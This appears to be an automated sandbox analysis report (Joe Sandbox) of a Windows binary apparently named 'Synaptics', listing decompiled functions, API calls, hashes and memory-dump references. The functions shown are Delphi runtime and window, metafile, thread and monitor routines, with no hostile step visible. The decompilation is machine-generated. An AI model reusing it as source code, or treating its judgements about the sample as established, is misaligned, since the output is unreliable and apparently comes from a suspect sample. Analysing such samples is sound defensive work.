                                                                                                                                                                                          • Opcode ID: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                          • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                                                                                                                                                          • Opcode Fuzzy Hash: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                          • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A8A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0045A8B7
                                                                                                                                                                                          • GetWindowRect.USER32 ref: 0045A911
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 0045A98A
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                                                                                                                                                          • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Active$MessageRect
                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                          • API String ID: 3147912190-3887548279
                                                                                                                                                                                          • Opcode ID: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                          • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00428300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042819C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
					E00425F58();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040275C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00425F58();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00425F58();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x428476);
				return E0040277C(_v16);
			}


























                                                                                                                                                                                          0x00428301
                                                                                                                                                                                          0x00428303
                                                                                                                                                                                          0x0042830c
                                                                                                                                                                                          0x0042830f
                                                                                                                                                                                          0x00428312
                                                                                                                                                                                          0x00428316
                                                                                                                                                                                          0x00428328
                                                                                                                                                                                          0x00428332
                                                                                                                                                                                          0x00428342
                                                                                                                                                                                          0x00428342
                                                                                                                                                                                          0x00428347
                                                                                                                                                                                          0x00428353
                                                                                                                                                                                          0x00428356
                                                                                                                                                                                          0x00428364
                                                                                                                                                                                          0x00428372
                                                                                                                                                                                          0x0042837c
                                                                                                                                                                                          0x00428385
                                                                                                                                                                                          0x00428387
                                                                                                                                                                                          0x00428387
                                                                                                                                                                                          0x004283a7
                                                                                                                                                                                          0x004283c4
                                                                                                                                                                                          0x004283c7
                                                                                                                                                                                          0x004283d0
                                                                                                                                                                                          0x004283d5
                                                                                                                                                                                          0x004283da
                                                                                                                                                                                          0x004283f0
                                                                                                                                                                                          0x004283f2
                                                                                                                                                                                          0x004283f7
                                                                                                                                                                                          0x004283f9
                                                                                                                                                                                          0x004283f9
                                                                                                                                                                                          0x0042840b
                                                                                                                                                                                          0x00428410
                                                                                                                                                                                          0x0042841a
                                                                                                                                                                                          0x00428420
                                                                                                                                                                                          0x00428425
                                                                                                                                                                                          0x0042842c
                                                                                                                                                                                          0x00428444
                                                                                                                                                                                          0x00428446
                                                                                                                                                                                          0x0042844b
                                                                                                                                                                                          0x0042844d
                                                                                                                                                                                          0x0042844d
                                                                                                                                                                                          0x00428452
                                                                                                                                                                                          0x00428458
                                                                                                                                                                                          0x0042845b
                                                                                                                                                                                          0x0042845e
                                                                                                                                                                                          0x0042846e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                                                                                                                                                          • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                                                                                                                                                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                                                                                                                                                          • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                                                                                                                                                          • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                                                                                                                                                          • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileMeta$Bits$DeleteHeader
                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                          • API String ID: 1990453761-2679148245
                                                                                                                                                                                          • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                          • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00421900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E00421900(char __edx) {
				char _v8;
				void* _v12;
				char _v16;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t29;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t42 = _t44;
				_t45 = _t44 + 0xfffffff4;
				_v8 = __edx;
				_t11 = GetCurrentThreadId();
				_t36 =  *0x49de40; // 0x49e034
				if(_t11 !=  *_t36) {
					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
					_push(_t42);
					_push(0x421a22);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					_push(0x49e86c);
					L00406FE0();
					_push(_t42);
					_push(0x421a04);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					if(E0049B5C4 == 0) {
						E0049B5C4 = E00403BBC(1);
					}
					_v16 = _v8;
					_t16 = E0049B5C4; // 0x0
					E0041AB10(_t16,  &_v16);
					E00421494();
					if( *0x49b532 != 0) {
						 *0x49b530();
					}
					_push(0x49e86c);
					L004071A0();
					_push(_t42);
					_push(0x4219e5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					WaitForSingleObject(_v12, 0xffffffff);
					_pop(_t38);
					 *[fs:eax] = _t38;
					_push(0x4219ec);
					_push(0x49e86c);
					L00406FE0();
					return 0;
				} else {
					_t29 =  *((intOrPtr*)(_v8 + 8))();
					return _t29;
				}
			}















                                                                                                                                                                                          0x00421901
                                                                                                                                                                                          0x00421903
                                                                                                                                                                                          0x00421907
                                                                                                                                                                                          0x0042190a
                                                                                                                                                                                          0x0042190f
                                                                                                                                                                                          0x00421917
                                                                                                                                                                                          0x00421934
                                                                                                                                                                                          0x00421939
                                                                                                                                                                                          0x0042193a
                                                                                                                                                                                          0x0042193f
                                                                                                                                                                                          0x00421942
                                                                                                                                                                                          0x00421945
                                                                                                                                                                                          0x0042194a
                                                                                                                                                                                          0x00421951
                                                                                                                                                                                          0x00421952
                                                                                                                                                                                          0x00421957
                                                                                                                                                                                          0x0042195a
                                                                                                                                                                                          0x00421964
                                                                                                                                                                                          0x00421972
                                                                                                                                                                                          0x00421972
                                                                                                                                                                                          0x0042197a
                                                                                                                                                                                          0x00421980
                                                                                                                                                                                          0x00421985
                                                                                                                                                                                          0x0042198a
                                                                                                                                                                                          0x00421997
                                                                                                                                                                                          0x004219a4
                                                                                                                                                                                          0x004219a4
                                                                                                                                                                                          0x004219aa
                                                                                                                                                                                          0x004219af
                                                                                                                                                                                          0x004219b6
                                                                                                                                                                                          0x004219b7
                                                                                                                                                                                          0x004219bc
                                                                                                                                                                                          0x004219bf
                                                                                                                                                                                          0x004219c8
                                                                                                                                                                                          0x004219cf
                                                                                                                                                                                          0x004219d2
                                                                                                                                                                                          0x004219d5
                                                                                                                                                                                          0x004219da
                                                                                                                                                                                          0x004219df
                                                                                                                                                                                          0x004219e4
                                                                                                                                                                                          0x00421919
                                                                                                                                                                                          0x0042191f
                                                                                                                                                                                          0x00421a3e
                                                                                                                                                                                          0x00421a3e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0042190A
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042192F
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 0042194A
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219AF
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000), ref: 004219C8
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,004219EC,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 1504017990-2364942553
                                                                                                                                                                                          • Opcode ID: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                          • Instruction ID: c735307bb3b187497a5fd69113a8ab7abc351a98bda77d86b61d484baaaa887a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 292f5edd8ce152165e351f987fd279c188195222a31a90e638a1b1ddc32d9408
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21B230A00204AFCB01EF55ED92E597BB4EB19728FA145BBF400977E0DB796C10CA59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042C82C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                                                                                                                                          0x0042c835
                                                                                                                                                                                          0x0042c838
                                                                                                                                                                                          0x0042c842
                                                                                                                                                                                          0x0042c867
                                                                                                                                                                                          0x0042c86f
                                                                                                                                                                                          0x0042c88f
                                                                                                                                                                                          0x0042c894
                                                                                                                                                                                          0x0042c89f
                                                                                                                                                                                          0x0042c8aa
                                                                                                                                                                                          0x0042c8b4
                                                                                                                                                                                          0x0042c8b5
                                                                                                                                                                                          0x0042c8b6
                                                                                                                                                                                          0x0042c8b7
                                                                                                                                                                                          0x0042c8b8
                                                                                                                                                                                          0x0042c8b9
                                                                                                                                                                                          0x0042c8c3
                                                                                                                                                                                          0x0042c8c5
                                                                                                                                                                                          0x0042c8cd
                                                                                                                                                                                          0x0042c8ce
                                                                                                                                                                                          0x0042c8ce
                                                                                                                                                                                          0x0042c8d3
                                                                                                                                                                                          0x0042c8d3
                                                                                                                                                                                          0x0042c844
                                                                                                                                                                                          0x0042c856
                                                                                                                                                                                          0x0042c863
                                                                                                                                                                                          0x0042c863
                                                                                                                                                                                          0x0042c8dd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C899
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 0042C8A4
                                                                                                                                                                                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                                                                                                                                                            • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                                                                          • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                                                                          • API String ID: 1539801207-1633989206
                                                                                                                                                                                          • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                          • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                                                                                                                                                          • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
				 *0x49b00c = 2;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e04e = 2;
				 *0x49e000 = E00405998;
				if(E00403A2C() != 0) {
					_t3 = E00403A5C();
				}
				E00403B20(_t3);
				 *0x49e054 = 0xd7b0;
				 *0x49e220 = 0xd7b0;
				 *0x49e3ec = 0xd7b0;
				 *0x49e040 = GetCommandLineA();
				 *0x49e03c = E004013AC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x49e5c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x49e034 = _t11;
				return _t11;
			}





                                                                                                                                                                                          0x00406b91
                                                                                                                                                                                          0x00406b96
                                                                                                                                                                                          0x00406b9b
                                                                                                                                                                                          0x00406b9d
                                                                                                                                                                                          0x00406ba4
                                                                                                                                                                                          0x00406bae
                                                                                                                                                                                          0x00406bb8
                                                                                                                                                                                          0x00406bbf
                                                                                                                                                                                          0x00406bd0
                                                                                                                                                                                          0x00406bd2
                                                                                                                                                                                          0x00406bd2
                                                                                                                                                                                          0x00406bd7
                                                                                                                                                                                          0x00406bdc
                                                                                                                                                                                          0x00406be5
                                                                                                                                                                                          0x00406bee
                                                                                                                                                                                          0x00406bfc
                                                                                                                                                                                          0x00406c06
                                                                                                                                                                                          0x00406c1a
                                                                                                                                                                                          0x00406c53
                                                                                                                                                                                          0x00406c1c
                                                                                                                                                                                          0x00406c2a
                                                                                                                                                                                          0x00406c42
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2c
                                                                                                                                                                                          0x00406c2a
                                                                                                                                                                                          0x00406c58
                                                                                                                                                                                          0x00406c5d
                                                                                                                                                                                          0x00406c62

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                            • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                            • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                            • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                          • String ID: 3}
                                                                                                                                                                                          • API String ID: 3734044017-1055849517
                                                                                                                                                                                          • Opcode ID: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                          • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                          0x004047c8
                                                                                                                                                                                          0x00404828
                                                                                                                                                                                          0x00404838
                                                                                                                                                                                          0x00404838
                                                                                                                                                                                          0x0040483e
                                                                                                                                                                                          0x004047ca
                                                                                                                                                                                          0x004047d3
                                                                                                                                                                                          0x004047e3
                                                                                                                                                                                          0x004047e3
                                                                                                                                                                                          0x004047ff
                                                                                                                                                                                          0x00404820
                                                                                                                                                                                          0x00404820

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                          • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00448030 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                                                                                                                                                          Download Yara Rule
